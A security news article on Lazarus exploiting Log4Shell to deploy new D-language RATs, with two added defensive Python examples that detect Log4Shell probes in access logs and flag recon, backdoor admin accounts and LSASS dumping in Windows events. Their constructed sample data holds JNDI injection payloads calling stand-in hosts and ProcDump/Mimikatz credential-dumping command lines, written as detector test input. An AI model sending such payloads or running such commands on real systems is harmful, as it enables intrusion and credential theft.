Lazarus hackers drop new RAT malware using 2-year-old Log4j bug (Security News, December 2023)

The notorious North Korean hacking group known as Lazarus continues to exploit CVE-2021-44228, aka "Log4Shell," this time to deploy three previously unseen malware families written in D (DLang).
The three are two remote access trojans, NineRAT and DLRAT, and a downloader, BottomLoader.
The D programming language is rarely seen in cybercrime operations, so Lazarus probably chose it for the new malware to evade detection tooling tuned to the usual languages.
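Log4Shell fires when attacker-controlled text reaches a log statement and Log4j resolves a ${jndi:...} lookup inside it, so the probe string lands in web-server logs before anything else happens. The detector below is an added example, not code from the article or from any of the tooling it describes. It percent-decodes each access-log line, collapses the nested lookups attackers use to hide the "${jndi:" prefix (${lower:j}, ${upper:N}, ${::-d}, ${env:X:-i}), and then extracts the JNDI scheme and callback target. The log lines are constructed; the addresses are documentation ranges, and the exact obfuscation forms handled are the common ones rather than an exhaustive list.

```python
"""Detector for Log4Shell (CVE-2021-44228) probe strings in access logs.

Added example, not code from the article or from the malware it describes.
The log lines below are constructed; hosts are RFC 5737 documentation addresses.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Lookups whose result is a literal string are the usual evasion of naive
# "${jndi:" matching: ${lower:J}, ${upper:n}, ${::-d}, ${env:NOPE:-i}.
# Each collapses to its captured text; nesting is handled by repeating the pass.
# The negative lookahead keeps "${jndi:ldap://host/a:-b}" from being swallowed
# as a default-value expression before the JNDI check runs.
_LITERAL_LOOKUP = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}"      # case transform of a literal
    r"|\$\{(?!\s*jndi)[^${}]*?:-([^${}]*)\}",         # default-value form, any prefix
    re.IGNORECASE,
)

# Once normalised, a JNDI lookup is "${jndi:<scheme>:<target>"; the closing brace
# is optional because WAFs and log truncation frequently cut it off.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^}\s\"']*)")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Percent-decode, then collapse literal-valued lookups until stable."""
    s = unquote(text)
    for _ in range(max_rounds):
        collapsed = _LITERAL_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), s
        )
        if collapsed == s:
            break
        s = collapsed
    return s.lower()


def find_jndi(text: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup found in one log line after de-obfuscation."""
    norm = normalize(text)
    return [
        {"scheme": m.group(1), "target": m.group(2), "normalized": m.group(0)}
        for m in _JNDI.finditer(norm)
    ]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan whole lines: request path, referer and user-agent all count."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        for finding in find_jndi(line):
            hits.append({"line": number, **finding})
    return hits


# Constructed sample lines in Combined Log Format, not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Dec/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2023:10:01:09 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [12/Dec/2023:10:01:11 +0000] '
    '"GET /api?x=${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/8.0"',
    '203.0.113.9 - - [12/Dec/2023:10:02:30 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fobj%7D HTTP/1.1" 200 88 "-" "-"',
    '10.0.0.8 - - [12/Dec/2023:10:03:00 +0000] "GET /docs/${env:HOME:-/tmp}/x HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['target']}")
```

The last sample line is there deliberately: a default-value lookup with no jndi inside is noise, not a hit, and a scanner that matches on "${" alone will page someone for it. The extracted target is the callback host the attacker expects the server to contact, which is what you hunt for in outbound LDAP/RMI connection logs next.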
Following the compromise, Lazarus sets up a proxy tool for persistent access to the breached server, runs reconnaissance commands, creates new admin accounts, and deploys credential-dumping tooling such as ProcDump (pointed at LSASS) and Mimikatz.
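The post-compromise steps listed above each leave a distinct trace on a Windows host, and the rules below show how they can be correlated. This is an added example, not code from the article or from any vendor product: it runs three rules over a constructed stream of Windows Security events (4720 account created, 4732 member added to a security-enabled local group) and Sysmon process-creation events (Event ID 1). The event field names, host and user names, SIDs, timestamps and the list of "recon" binaries are assumptions made for this demo.

```python
"""Detection rules for the post-compromise steps named in the article.

Added example, not code from the article or any vendor product. It runs three
rules over a constructed stream of Windows Security events (4720 account
created, 4732 member added to a local group) and Sysmon process-creation
events (EID 1). The event field names, hosts, users, SIDs and timestamps are
assumptions made for this demo.
"""
from datetime import datetime, timedelta
from typing import Dict, List

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group
# Binaries that, run in a burst by one account, look like hands-on-keyboard recon (assumed list).
RECON_BINARIES = {"whoami", "ipconfig", "systeminfo", "tasklist", "nltest", "netstat"}


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["ts"])


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def recon_bursts(events: List[Dict], window: timedelta = timedelta(minutes=5),
                 threshold: int = 3) -> List[Dict]:
    """One account running >= threshold distinct recon binaries inside window."""
    runs: Dict[str, List] = {}
    for e in events:
        if e["id"] != 1:
            continue
        exe = _basename(e["image"])
        exe = exe[:-4] if exe.endswith(".exe") else exe
        if exe in RECON_BINARIES:
            runs.setdefault(e["user"], []).append((_ts(e), exe))
    alerts = []
    for user, seq in runs.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):
            seen = {exe for t, exe in seq[i:] if t - start <= window}
            if len(seen) >= threshold:
                alerts.append({"rule": "recon_burst", "user": user, "cmds": sorted(seen)})
                break
    return alerts


def new_local_admins(events: List[Dict], window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """4720 (account created) followed by 4732 adding that SID to Administrators."""
    created: Dict[str, tuple] = {}  # new account SID -> (creation time, name)
    alerts = []
    for e in events:
        if e["id"] == 4720:
            created[e["target_sid"]] = (_ts(e), e["target_user"])
        elif e["id"] == 4732 and e["group_sid"] == ADMINISTRATORS_SID:
            hit = created.get(e["member_sid"])
            if hit and _ts(e) - hit[0] <= window:
                alerts.append({"rule": "new_local_admin", "user": hit[1], "by": e["subject_user"]})
    return alerts


def credential_dumping(events: List[Dict]) -> List[Dict]:
    """ProcDump pointed at LSASS, or Mimikatz by image name or by its module syntax.

    Keying on the '-ma' switch next to 'lsass' catches a renamed procdump binary;
    keying on 'sekurlsa::' catches a renamed mimikatz.
    """
    alerts = []
    for e in events:
        if e["id"] != 1:
            continue
        exe, cmd = _basename(e["image"]), e["cmd"].lower()
        tokens = cmd.split()
        if "lsass" in cmd and ("procdump" in exe or "procdump" in cmd or "-ma" in tokens):
            alerts.append({"rule": "lsass_dump_procdump", "user": e["user"], "cmd": e["cmd"]})
        elif "mimikatz" in exe or "sekurlsa::" in cmd:
            alerts.append({"rule": "mimikatz", "user": e["user"], "cmd": e["cmd"]})
    return alerts


def detect(events: List[Dict]) -> List[Dict]:
    return recon_bursts(events) + new_local_admins(events) + credential_dumping(events)


NEW_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # assumed SID of the new account
SAMPLE_EVENTS: List[Dict] = [  # constructed, in time order
    {"ts": "2023-12-01T10:00:01", "id": 1, "user": "WEB01\\svc_web",
     "image": "C:\\Windows\\System32\\whoami.exe", "cmd": "whoami /all"},
    {"ts": "2023-12-01T10:00:20", "id": 1, "user": "WEB01\\svc_web",
     "image": "C:\\Windows\\System32\\ipconfig.exe", "cmd": "ipconfig /all"},
    {"ts": "2023-12-01T10:00:45", "id": 1, "user": "WEB01\\svc_web",
     "image": "C:\\Windows\\System32\\systeminfo.exe", "cmd": "systeminfo"},
    {"ts": "2023-12-01T10:03:00", "id": 4720, "subject_user": "svc_web",
     "target_user": "svc_backup", "target_sid": NEW_SID},
    {"ts": "2023-12-01T10:03:05", "id": 4732, "subject_user": "svc_web",
     "group_sid": ADMINISTRATORS_SID, "member_sid": NEW_SID},
    {"ts": "2023-12-01T10:15:00", "id": 1, "user": "WEB01\\svc_backup",
     "image": "C:\\Users\\Public\\pd.exe",          # renamed ProcDump
     "cmd": "pd.exe -accepteula -ma lsass.exe C:\\Users\\Public\\l.dmp"},
    {"ts": "2023-12-01T10:16:00", "id": 1, "user": "WEB01\\svc_backup",
     "image": "C:\\Users\\Public\\m.exe",           # renamed Mimikatz
     "cmd": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"ts": "2023-12-01T11:00:00", "id": 1, "user": "WEB01\\admin",   # benign single lookup
     "image": "C:\\Windows\\System32\\ipconfig.exe", "cmd": "ipconfig"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two design choices matter here. The admin-account rule keys on SIDs rather than names, because 4732 often carries only the member SID, and it requires the 4720 to precede the 4732 within a short window, which is what separates a fresh backdoor account from routine group maintenance. The dumping rule does not trust the binary name, since both ProcDump and Mimikatz are trivially renamed; the LSASS target and the Mimikatz module syntax survive renaming. The proxy tool the article mentions is not modelled because the article does not say what it is.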
Related news
- Chinese hackers target Russian govt with upgraded RAT malware
- Microsoft: New RAT malware used for crypto theft, reconnaissance
- Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners
- Chinese FamousSparrow hackers deploy upgraded malware in attacks
- We Smell a (DC)Rat: Revealing a Sophisticated Malware Delivery Chain
- North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages
- Pakistan-Linked Hackers Expand Targets in India with CurlBack RAT and Spark RAT
- Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool
- State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
- Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | CWE | CVSS
---|---|---|---|---
2021-12-10 | CVE-2021-44228 | Deserialization of Untrusted Data in Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1): JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. Network attack vector, low complexity; severity critical. | CWE-502 | 10.0

Vendors tagged as affected: Apache, Siemens, Intel, Debian, Fedora Project, SonicWall, NetApp, Cisco, Snow Software, Bentley, Percussion, Apple.